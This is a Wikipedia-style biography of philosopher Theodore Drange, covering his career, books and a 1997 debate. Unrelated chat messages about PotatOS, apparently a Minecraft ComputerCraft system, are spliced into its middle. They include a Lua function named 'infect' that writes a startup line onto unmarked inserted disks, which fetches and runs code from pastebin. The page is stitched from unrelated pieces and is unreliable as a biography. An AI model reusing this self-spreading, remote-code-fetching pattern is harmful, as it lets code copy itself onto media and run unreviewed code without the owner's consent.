Theodore Drange

Theodore "Ted" Michael Drange (born 1934) is a philosopher of religion and Professor Emeritus at West Virginia University, where he taught philosophy from 1966 to 2001.

Theodore Drange
Born1934
Era20th-century philosophy
RegionWestern philosophy
SchoolAnalytic philosophy
Main interests
Philosophy of religion, philosophy of language, epistemology
Notable ideas
Argument from nonbelief

Life

After graduating from Fort Hamilton High School, he received a B.A. from Brooklyn College in 1955 and a Ph.D. from Cornell University in 1963, where he moved to after one year of graduate school at Yale.

He taught at Brooklyn College (1960–62), the University of Oregon (1962–65), Idaho State University (1965–66) and West Virginia University, 1966-2001 after becoming a full professor in 1974. Drange retired in 2001 and moved to Ventura, CA.[1]

Drange's primarily interests, until the early 1980s were in philosophy of language and epistemology, later shifting to philosophy of religion.

Drange's first book, Type Crossings (The Hague: Mouton & Co., 1966) was a revision of his Ph.D. dissertation under Max Black on the philosophy of language and was published in 1966. His other book was in the philosophy of religion, Nonbelief and Evil (Amherst, NY: Prometheus Books, 1998), in 1998. Drange has also written several articles on the philosophy of religion and atheism, particularly for the Internet Infidels organization. In 1997, he debated Christian apologist William Lane Craig on the existence of God.[2][3]

Drange married his wife Annette in 1959 and had two children, Susan and Michael.

Bibliography

  • Drange, Theodore. "Brief Autobiography of Theodore M. Drange". Internet Infidels. Retrieved 2007-04-09.
  • Drange, Theodore. "Brief Biography of Theodore M. Drange". Retrieved 2007-05-25.
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.
gollark: <@151391317740486657>

See also

References

  1. http://home.earthlink.net/~writetdrange/bio.html
  2. Does God Exist? on YouTube University of Illinois, 1997.
  3. "Does God Exist?". LeaderU. Retrieved January 15, 2014.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.